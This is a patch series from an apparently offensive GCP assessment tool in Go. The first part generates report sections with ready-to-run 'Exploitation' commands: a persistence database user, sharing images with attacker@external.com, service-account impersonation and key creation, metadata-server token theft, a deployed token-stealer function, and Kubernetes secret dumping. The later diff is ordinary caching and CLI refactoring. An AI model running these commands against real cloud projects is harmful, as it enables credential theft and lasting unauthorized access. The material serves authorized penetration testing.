sections.WriteString("# Connect to Cloud SQL instance\n") + sections.WriteString("gcloud sql connect INSTANCE_NAME --user=USER --project=PROJECT\n\n") + sections.WriteString("# Create database user for persistence\n") + sections.WriteString("gcloud sql users create attacker --instance=INSTANCE_NAME --password=PASSWORD\n") + sections.WriteString("```\n\n") + } + + // Compute Sharing + if len(categories["Compute Sharing"]) > 0 { + sections.WriteString("## Compute Resource Sharing\n\n") + sections.WriteString("Principals with compute sharing permissions can share images/snapshots with external projects.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Compute Sharing"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Share VM image with external project\n") + sections.WriteString("gcloud compute images add-iam-policy-binding IMAGE_NAME \\\n") + sections.WriteString(" --member='user:attacker@external.com' --role='roles/compute.imageUser'\n\n") + sections.WriteString("# Share snapshot with external project\n") + sections.WriteString("gcloud compute snapshots add-iam-policy-binding SNAPSHOT_NAME \\\n") + sections.WriteString(" --member='user:attacker@external.com' --role='roles/compute.storageAdmin'\n") + sections.WriteString("```\n\n") + } + + // Service Account Impersonation (from lateral movement module) + if len(categories["Service Account Impersonation"]) > 0 { + sections.WriteString("## Service Account Impersonation Chains\n\n") + sections.WriteString("These principals can impersonate service accounts to gain their permissions.\n\n") + sections.WriteString("### Identified Chains:\n") + for _, path := range categories["Service Account Impersonation"] { + sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.Principal, path.TargetResource)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Generate access token for target SA\n") + sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Use token with any gcloud command\n") + sections.WriteString("gcloud compute instances list --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Service Account Key Creation + if len(categories["Service Account Key Creation"]) > 0 { + sections.WriteString("## Service Account Key Creation\n\n") + sections.WriteString("These principals can create persistent keys for service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Service Account Key Creation"] { + sections.WriteString(fmt.Sprintf("- %s can create keys for %s\n", path.Principal, path.TargetResource)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create persistent key for long-term access\n") + sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Activate the key\n") + sections.WriteString("gcloud auth activate-service-account --key-file=key.json\n") + sections.WriteString("```\n\n") + } + + // Compute Instance Token Theft + if len(categories["Compute Instance Token Theft"]) > 0 { + sections.WriteString("## Compute Instance Token Theft\n\n") + sections.WriteString("These compute instances have attached service accounts whose tokens can be stolen via the metadata server.\n\n") + sections.WriteString("### Vulnerable Instances:\n") + for _, path := range categories["Compute Instance Token Theft"] { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# SSH into the instance\n") + sections.WriteString("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=PROJECT_ID\n\n") + sections.WriteString("# Steal SA token from metadata server\n") + sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# Get SA email\n") + sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'\n\n") + sections.WriteString("# Use token with curl\n") + sections.WriteString("TOKEN=$(curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)\n") + sections.WriteString("curl -H \"Authorization: Bearer $TOKEN\" \\\n") + sections.WriteString(" 'https://www.googleapis.com/compute/v1/projects/PROJECT/zones/ZONE/instances'\n") + sections.WriteString("```\n\n") + } + + // Cloud Functions Token Theft + if len(categories["Cloud Function Token Theft"]) > 0 { + sections.WriteString("## Cloud Functions Token Theft\n\n") + sections.WriteString("These Cloud Functions have attached service accounts. Deploy a malicious function to steal tokens.\n\n") + sections.WriteString("### Vulnerable Functions:\n") + for _, path := range categories["Cloud Function Token Theft"] { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create token stealer function\n") + sections.WriteString("mkdir /tmp/fn-stealer && cd /tmp/fn-stealer\n\n") + sections.WriteString("cat > main.py << 'EOF'\n") + sections.WriteString("import functions_framework\n") + sections.WriteString("import requests\n\n") + sections.WriteString("@functions_framework.http\n") + sections.WriteString("def steal(request):\n") + sections.WriteString(" r = requests.get(\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") + sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") + sections.WriteString(" return r.json()\n") + sections.WriteString("EOF\n\n") + sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") + sections.WriteString("# Deploy with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs)\n") + sections.WriteString("gcloud functions deploy stealer --gen2 --runtime=python311 \\\n") + sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") + sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Invoke to get token\n") + sections.WriteString("curl $(gcloud functions describe stealer --format='value(url)')\n") + sections.WriteString("```\n\n") + } + + // Cloud Run Token Theft + if len(categories["Cloud Run Token Theft"]) > 0 { + sections.WriteString("## Cloud Run Token Theft\n\n") + sections.WriteString("These Cloud Run services have attached service accounts.\n\n") + sections.WriteString("### Vulnerable Services:\n") + for _, path := range categories["Cloud Run Token Theft"] { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Deploy Cloud Run service with target SA\n") + sections.WriteString("# (requires run.services.create + iam.serviceAccounts.actAs)\n") + sections.WriteString("gcloud run deploy stealer --image=gcr.io/PROJECT/stealer \\\n") + sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --allow-unauthenticated\n\n") + sections.WriteString("# Container code fetches token from metadata server same as compute\n") + sections.WriteString("```\n\n") + } + + // GKE Cluster Token Theft + if len(categories["GKE Cluster Token Theft"]) > 0 || len(categories["GKE Node Pool Token Theft"]) > 0 { + sections.WriteString("## GKE Cluster Token Theft\n\n") + sections.WriteString("These GKE clusters have node service accounts that can be accessed from pods.\n\n") + sections.WriteString("### Vulnerable Clusters:\n") + for _, path := range categories["GKE Cluster Token Theft"] { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) + } + for _, path := range categories["GKE Node Pool Token Theft"] { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Get cluster credentials\n") + sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT\n\n") + sections.WriteString("# If Workload Identity is NOT enabled, steal node SA token from any pod:\n") + sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# If Workload Identity IS enabled, check for pod SA token:\n") + sections.WriteString("kubectl exec -it POD -- cat /var/run/secrets/kubernetes.io/serviceaccount/token\n\n") + sections.WriteString("# List secrets for credentials\n") + sections.WriteString("kubectl get secrets -A -o yaml\n") + sections.WriteString("```\n\n") + } + + return sections.String() +} From eb76d76dead648504aaa302c621cb061025787f5 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Wed, 4 Feb 2026 14:15:16 -0500 Subject: [PATCH 34/48] physical cache instead of memory. 1st wave of cleanup --- cli/gcp.go | 247 ++- gcp/commands/appengine.go | 4 +- gcp/commands/artifact-registry.go | 13 +- gcp/commands/assetinventory.go | 13 +- gcp/commands/backupinventory.go | 9 +- gcp/commands/beyondcorp.go | 8 +- gcp/commands/bigquery.go | 18 +- gcp/commands/bigtable.go | 8 +- gcp/commands/bucketenum.go | 39 +- gcp/commands/buckets.go | 47 +- gcp/commands/certmanager.go | 7 +- gcp/commands/cloudarmor.go | 6 +- gcp/commands/cloudbuild.go | 4 +- gcp/commands/cloudrun.go | 281 ++- gcp/commands/composer.go | 4 +- gcp/commands/crossproject.go | 470 +++-- gcp/commands/dataexfiltration.go | 895 +++------- gcp/commands/dataflow.go | 4 +- gcp/commands/dataproc.go | 13 +- gcp/commands/dns.go | 11 +- gcp/commands/domainwidedelegation.go | 513 +++++- gcp/commands/endpoints.go | 4 +- gcp/commands/firewall.go | 9 +- gcp/commands/functions.go | 227 ++- gcp/commands/gke.go | 96 +- gcp/commands/iam.go | 196 +++ gcp/commands/iap.go | 9 +- gcp/commands/instances.go | 18 +- gcp/commands/inventory.go | 1527 +++++++++++++++++ gcp/commands/kms.go | 71 +- gcp/commands/lateralmovement.go | 135 +- gcp/commands/loadbalancers.go | 9 +- gcp/commands/logging.go | 319 ++-- gcp/commands/logginggaps.go | 326 ---- gcp/commands/networktopology.go | 9 +- gcp/commands/notebooks.go | 8 +- gcp/commands/organizations.go | 147 +- gcp/commands/permissions.go | 201 ++- gcp/commands/privateserviceconnect.go | 16 +- gcp/commands/privesc.go | 180 +- gcp/commands/pubsub.go | 433 ++++- gcp/commands/scheduler.go | 4 +- gcp/commands/secrets.go | 51 +- gcp/commands/serviceaccounts.go | 221 ++- gcp/commands/serviceagents.go | 214 ++- gcp/commands/sourcerepos.go | 16 +- gcp/commands/spanner.go | 18 +- gcp/commands/vpcnetworks.go | 12 +- gcp/commands/workloadidentity.go | 85 +- .../attackpathService/attackpathService.go | 474 +++++ .../cloudrunService/cloudrunService.go | 125 +- .../functionsService/functionsService.go | 42 +- gcp/services/gkeService/gkeService.go | 32 +- .../loggingGapsService/loggingGapsService.go | 514 ------ gcp/services/loggingService/loggingService.go | 303 ++++ .../organizationsService.go | 30 + .../serviceAgentsService.go | 69 +- globals/gcp.go | 1 - internal/gcp/attackpath_cache.go | 127 ++ internal/gcp/hierarchy.go | 17 +- internal/gcp/org_cache.go | 207 +++ internal/gcp/persistent_cache.go | 389 +++++ 62 files changed, 6907 insertions(+), 2598 deletions(-) create mode 100644 gcp/commands/inventory.go delete mode 100644 gcp/commands/logginggaps.go delete mode 100644 gcp/services/loggingGapsService/loggingGapsService.go create mode 100644 internal/gcp/org_cache.go create mode 100644 internal/gcp/persistent_cache.go diff --git a/cli/gcp.go b/cli/gcp.go index 1ff409dd..ae8641a6 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -36,6 +36,12 @@ var ( // Attack path analysis flag GCPAttackPaths bool + // Organization cache flag - enumerates all orgs/folders/projects for cross-project analysis + GCPOrgCache bool + + // Refresh cache flag - force re-enumeration even if cache exists + GCPRefreshCache bool + // misc options // GCPIgnoreCache bool @@ -49,12 +55,23 @@ var ( Long: `See "Available Commands" for GCP Modules below`, Short: "See \"Available Commands\" for GCP Modules below", PersistentPreRun: func(cmd *cobra.Command, args []string) { - // Initialize project names map + // Reset project IDs and names to avoid accumulation across commands + GCPProjectIDs = nil GCPProjectNames = make(map[string]string) // Handle project discovery based on flags - if GCPAllProjects { - // Discover all accessible projects + // Priority: -p (single project) > -l (project list) > -A (all projects) + if GCPProjectID != "" { + // Single project specified with -p/--project + GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) + resolveProjectNames(GCPProjectIDs) + } else if GCPProjectIDsFilePath != "" { + // Project list specified with -l/--project-list + rawProjectIDs := internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + GCPProjectIDs = deduplicateProjectIDs(rawProjectIDs) + resolveProjectNames(GCPProjectIDs) + } else if GCPAllProjects { + // Discover all accessible projects with -A/--all-projects GCPLogger.InfoM("Discovering all accessible projects...", "gcp") orgsSvc := orgsservice.New() projects, err := orgsSvc.SearchProjects("") @@ -71,17 +88,8 @@ var ( GCPLogger.FatalM("No accessible projects found. Check your permissions.", "gcp") } GCPLogger.InfoM(fmt.Sprintf("Discovered %d project(s)", len(GCPProjectIDs)), "gcp") - } else if GCPProjectID != "" { - GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) - // Resolve project name for single project - resolveProjectNames(GCPProjectIDs) - } else if GCPProjectIDsFilePath != "" { - rawProjectIDs := internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) - GCPProjectIDs = deduplicateProjectIDs(rawProjectIDs) - // Resolve project names for all projects in list - resolveProjectNames(GCPProjectIDs) } else { - GCPLogger.InfoM("project, project-list, or all-projects flag not given, commands requiring a project ID will fail", "gcp") + GCPLogger.InfoM("No project scope specified. Use -p, -l, or -A flag.", "gcp") } // Create a context with project IDs and names @@ -115,15 +123,28 @@ var ( } } - // If --attack-paths flag is set, run attack path analysis and populate cache + // Get account for cache operations + account, _ := ctx.Value("account").(string) + + // If --attack-paths flag is set, load or run attack path analysis // This allows individual modules to show the Attack Paths column if GCPAttackPaths && len(GCPProjectIDs) > 0 { - GCPLogger.InfoM("Running attack path analysis (privesc/exfil/lateral)...", "gcp") - attackPathCache := runAttackPathAnalysisAndPopulateCache(ctx) + GCPLogger.InfoM("Loading/running attack path analysis (privesc/exfil/lateral)...", "gcp") + attackPathCache := loadOrRunAttackPathAnalysis(ctx, GCPRefreshCache) if attackPathCache != nil && attackPathCache.IsPopulated() { ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) privesc, exfil, lateral := attackPathCache.GetStats() - GCPLogger.SuccessM(fmt.Sprintf("Attack path cache populated: %d privesc, %d exfil, %d lateral - modules will show Attack Paths column", privesc, exfil, lateral), "gcp") + GCPLogger.SuccessM(fmt.Sprintf("Attack path cache ready: %d privesc, %d exfil, %d lateral - modules will show Attack Paths column", privesc, exfil, lateral), "gcp") + } + } + + // If --org-cache flag is set, load or enumerate all orgs/folders/projects + // This is useful for cross-project analysis modules + if GCPOrgCache { + GCPLogger.InfoM("Loading/enumerating organization data...", "gcp") + orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) + if orgCache != nil && orgCache.IsPopulated() { + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) } } @@ -207,6 +228,26 @@ var GCPAllChecksCommand = &cobra.Command{ var executedModules []string startTime := time.Now() ctx := cmd.Context() + account, _ := ctx.Value("account").(string) + + // Set all-checks mode - individual modules will skip saving cache + // (we'll save consolidated cache at the end) + ctx = gcpinternal.SetAllChecksMode(ctx, true) + cmd.SetContext(ctx) + + // Load or populate org cache for cross-project modules + existingOrgCache := gcpinternal.GetOrgCacheFromContext(ctx) + if existingOrgCache == nil || !existingOrgCache.IsPopulated() { + GCPLogger.InfoM("Loading/enumerating organization data for cross-project analysis...", "all-checks") + orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) + if orgCache != nil && orgCache.IsPopulated() { + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) + cmd.SetContext(ctx) + } + } else { + orgs, folders, projects := existingOrgCache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing org cache: %d org(s), %d folder(s), %d project(s)", orgs, folders, projects), "all-checks") + } // Find the privesc command to run first var privescCmd *cobra.Command @@ -223,13 +264,22 @@ var GCPAllChecksCommand = &cobra.Command{ privescCmd.Run(cmd, args) executedModules = append(executedModules, "privesc") - // After running privesc, populate attack path cache for other modules - attackPathCache := runAttackPathAnalysisAndPopulateCache(ctx) - if attackPathCache != nil && attackPathCache.IsPopulated() { - ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) - cmd.SetContext(ctx) - privesc, exfil, lateral := attackPathCache.GetStats() - GCPLogger.SuccessM(fmt.Sprintf("Attack path cache populated: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") + // After running privesc, load or populate attack path cache for other modules + // BUT only if cache wasn't already populated by --attack-paths flag in PersistentPreRun + existingCache := gcpinternal.GetAttackPathCacheFromContext(ctx) + if existingCache != nil && existingCache.IsPopulated() { + // Cache already populated by --attack-paths flag, reuse it + privesc, exfil, lateral := existingCache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing attack path cache: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") + } else { + // Load from disk or run analysis + attackPathCache := loadOrRunAttackPathAnalysis(ctx, GCPRefreshCache) + if attackPathCache != nil && attackPathCache.IsPopulated() { + ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) + cmd.SetContext(ctx) + privesc, exfil, lateral := attackPathCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("Attack path cache ready: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") + } } GCPLogger.InfoM("", "all-checks") } @@ -265,8 +315,33 @@ var GCPAllChecksCommand = &cobra.Command{ }, } -// runAttackPathAnalysisAndPopulateCache runs attack path analysis for all types and returns a populated cache -func runAttackPathAnalysisAndPopulateCache(ctx context.Context) *gcpinternal.AttackPathCache { +// loadOrRunAttackPathAnalysis loads attack path cache from disk if available, or runs analysis and saves it +func loadOrRunAttackPathAnalysis(ctx context.Context, forceRefresh bool) *gcpinternal.AttackPathCache { + account, _ := ctx.Value("account").(string) + + // Check if cache exists and we're not forcing refresh + if !forceRefresh && gcpinternal.AttackPathCacheExists(GCPOutputDirectory, account) { + cache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(GCPOutputDirectory, account) + if err == nil && cache != nil { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "attack-paths") + privesc, exfil, lateral := cache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Loaded attack path cache from disk (age: %s, %d projects analyzed, P:%d E:%d L:%d)", + formatDuration(age), len(metadata.ProjectsIn), privesc, exfil, lateral), "gcp") + return cache + } + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not load attack path cache: %v, re-analyzing...", err), "gcp") + // Delete corrupted cache file + gcpinternal.DeleteCache(GCPOutputDirectory, account, "attack-paths") + } + } + + // Run analysis and create cache + return runAttackPathAnalysisAndSave(ctx) +} + +// runAttackPathAnalysisAndSave runs attack path analysis and saves to disk +func runAttackPathAnalysisAndSave(ctx context.Context) *gcpinternal.AttackPathCache { cache := gcpinternal.NewAttackPathCache() // Get project IDs from context @@ -275,6 +350,9 @@ func runAttackPathAnalysisAndPopulateCache(ctx context.Context) *gcpinternal.Att return cache } + // Get account from context + account, _ := ctx.Value("account").(string) + // Get project names from context projectNames, _ := ctx.Value("projectNames").(map[string]string) if projectNames == nil { @@ -287,10 +365,13 @@ func runAttackPathAnalysisAndPopulateCache(ctx context.Context) *gcpinternal.Att // Run analysis for all attack path types result, err := svc.CombinedAttackPathAnalysis(ctx, projectIDs, projectNames, "all") if err != nil { - GCPLogger.ErrorM(fmt.Sprintf("Failed to run attack path analysis: %v", err), "all-checks") + GCPLogger.ErrorM(fmt.Sprintf("Failed to run attack path analysis: %v", err), "gcp") return cache } + // Store raw data for modules that need full details (like privesc) + cache.SetRawData(result) + // Convert paths to cache format var pathInfos []gcpinternal.AttackPathInfo for _, path := range result.AllPaths { @@ -323,16 +404,111 @@ func runAttackPathAnalysisAndPopulateCache(ctx context.Context) *gcpinternal.Att // Populate cache cache.PopulateFromPaths(pathInfos) + // Save to disk + err = gcpinternal.SaveAttackPathCacheToFile(cache, projectIDs, GCPOutputDirectory, account, "2.0.0") + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not save attack path cache to disk: %v", err), "gcp") + } else { + cacheDir := gcpinternal.GetCacheDirectory(GCPOutputDirectory, account) + GCPLogger.InfoM(fmt.Sprintf("Attack path cache saved to %s", cacheDir), "gcp") + } + privesc, exfil, lateral := cache.GetStats() - GCPLogger.InfoM(fmt.Sprintf("Attack path analysis: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Attack path analysis: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "gcp") return cache } // runPrivescAndPopulateCache is kept for backward compatibility -// DEPRECATED: Use runAttackPathAnalysisAndPopulateCache instead +// DEPRECATED: Use loadOrRunAttackPathAnalysis instead func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { - return runAttackPathAnalysisAndPopulateCache(ctx) + return runAttackPathAnalysisAndSave(ctx) +} + +// loadOrPopulateOrgCache loads org cache from disk if available, or enumerates and saves it +func loadOrPopulateOrgCache(account string, forceRefresh bool) *gcpinternal.OrgCache { + // Check if cache exists and we're not forcing refresh + if !forceRefresh && gcpinternal.OrgCacheExists(GCPOutputDirectory, account) { + cache, metadata, err := gcpinternal.LoadOrgCacheFromFile(GCPOutputDirectory, account) + if err == nil && cache != nil { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Loaded org cache from disk (age: %s, %d projects)", + formatDuration(age), metadata.TotalProjects), "gcp") + return cache + } + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not load org cache: %v, re-enumerating...", err), "gcp") + // Delete corrupted cache file + gcpinternal.DeleteCache(GCPOutputDirectory, account, "org") + } + } + + // Enumerate and create cache + cache := enumerateAndCacheOrgs(account) + return cache +} + +// enumerateAndCacheOrgs enumerates all orgs/folders/projects and saves to disk +func enumerateAndCacheOrgs(account string) *gcpinternal.OrgCache { + cache := gcpinternal.NewOrgCache() + + orgsSvc := orgsservice.New() + + // Get all organizations + orgs, err := orgsSvc.SearchOrganizations() + if err == nil { + for _, org := range orgs { + cache.AddOrganization(gcpinternal.CachedOrganization{ + ID: org.Name[len("organizations/"):], // Strip prefix + Name: org.Name, + DisplayName: org.DisplayName, + }) + } + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err == nil { + for _, folder := range folders { + cache.AddFolder(gcpinternal.CachedFolder{ + ID: folder.Name[len("folders/"):], // Strip prefix + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + } + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err == nil { + for _, project := range projects { + cache.AddProject(gcpinternal.CachedProject{ + ID: project.ProjectID, + Name: project.Name, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } + + cache.MarkPopulated() + + // Save to disk + err = gcpinternal.SaveOrgCacheToFile(cache, GCPOutputDirectory, account, "2.0.0") + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not save org cache to disk: %v", err), "gcp") + } else { + cacheDir := gcpinternal.GetCacheDirectory(GCPOutputDirectory, account) + GCPLogger.InfoM(fmt.Sprintf("Org cache saved to %s", cacheDir), "gcp") + } + + orgsCount, foldersCount, projectsCount := cache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Organization cache populated: %d org(s), %d folder(s), %d project(s)", + orgsCount, foldersCount, projectsCount), "gcp") + + return cache } // printExecutionSummary prints a summary of all executed modules @@ -385,7 +561,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "A", true, "Automatically discover and target all accessible projects (default)") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "A", false, "Automatically discover and target all accessible projects") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") @@ -395,6 +571,8 @@ func init() { GCPCommands.PersistentFlags().BoolVarP(&GCPWrapTable, "wrap", "w", false, "Wrap table to fit in terminal (complicates grepping)") GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") GCPCommands.PersistentFlags().BoolVar(&GCPAttackPaths, "attack-paths", false, "Run attack path analysis (privesc/exfil/lateral) and add Attack Paths column to module output") + GCPCommands.PersistentFlags().BoolVar(&GCPOrgCache, "org-cache", false, "Enumerate all accessible orgs/folders/projects and cache for cross-project analysis") + GCPCommands.PersistentFlags().BoolVar(&GCPRefreshCache, "refresh-cache", false, "Force re-enumeration of cached data even if cache files exist") // Available commands GCPCommands.AddCommand( @@ -466,7 +644,6 @@ func init() { commands.GCPOrgPoliciesCommand, commands.GCPBucketEnumCommand, commands.GCPCrossProjectCommand, - commands.GCPLoggingGapsCommand, commands.GCPSourceReposCommand, commands.GCPServiceAgentsCommand, commands.GCPDomainWideDelegationCommand, @@ -477,6 +654,12 @@ func init() { commands.GCPDataExfiltrationCommand, commands.GCPPublicAccessCommand, + // Inventory command + commands.GCPInventoryCommand, + + // Hidden admin commands + commands.GCPHiddenAdminsCommand, + // All checks (last) GCPAllChecksCommand, ) diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 22100a7a..6cbee0b4 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -492,7 +492,7 @@ func (m *AppEngineModule) getTableHeader() []string { "Ingress", "Public", "Service Account", - "Attack Paths", + "SA Attack Paths", "Default SA", "Deprecated", "Env Vars", @@ -534,7 +534,7 @@ func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngi } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if ver.ServiceAccount != "" { attackPaths = m.AttackPathCache.GetAttackSummary(ver.ServiceAccount) diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 57e904b0..e93d028f 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -323,25 +323,23 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna // getRepoHeader returns the header for repository table func (m *ArtifactRegistryModule) getRepoHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Name", "Format", "Location", "Mode", "Public", "Encryption", - "Resource Role", + "IAM Binding Role", "Principal Type", - "Resource Principal", + "IAM Binding Principal", } } // getArtifactHeader returns the header for artifact table func (m *ArtifactRegistryModule) getArtifactHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Name", "Repository", "Location", @@ -380,7 +378,6 @@ func (m *ArtifactRegistryModule) reposToTableBody(repos []ArtifactRegistryServic for _, member := range binding.Members { memberType := ArtifactRegistryService.GetMemberType(member) body = append(body, []string{ - repo.ProjectID, m.GetProjectName(repo.ProjectID), repoName, repo.Format, @@ -397,7 +394,6 @@ func (m *ArtifactRegistryModule) reposToTableBody(repos []ArtifactRegistryServic } else { // Repository with no IAM bindings body = append(body, []string{ - repo.ProjectID, m.GetProjectName(repo.ProjectID), repoName, repo.Format, @@ -429,7 +425,6 @@ func (m *ArtifactRegistryModule) artifactsToTableBody(artifacts []ArtifactRegist } body = append(body, []string{ - artifact.ProjectID, m.GetProjectName(artifact.ProjectID), artifact.Name, artifact.Repository, diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index 999f7064..09dea50d 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -595,7 +595,7 @@ func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) } if checkIAM { - header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location", "Resource Role", "Resource Principal", "Public"} + header := []string{"Project", "Name", "Asset Type", "Location", "IAM Binding Role", "IAM Binding Principal", "Public"} var body [][]string for _, asset := range assets { publicAccess := "No" @@ -605,7 +605,6 @@ func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) if len(asset.IAMBindings) == 0 { body = append(body, []string{ - asset.ProjectID, m.GetProjectName(asset.ProjectID), asset.Name, assetservice.ExtractAssetTypeShort(asset.AssetType), @@ -618,7 +617,6 @@ func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) for _, binding := range asset.IAMBindings { for _, member := range binding.Members { body = append(body, []string{ - asset.ProjectID, m.GetProjectName(asset.ProjectID), asset.Name, assetservice.ExtractAssetTypeShort(asset.AssetType), @@ -645,7 +643,6 @@ func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) for _, member := range binding.Members { if shared.IsPublicPrincipal(member) { publicBody = append(publicBody, []string{ - asset.ProjectID, m.GetProjectName(asset.ProjectID), asset.Name, asset.AssetType, @@ -661,16 +658,15 @@ func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) if len(publicBody) > 0 { tables = append(tables, internal.TableFile{ Name: 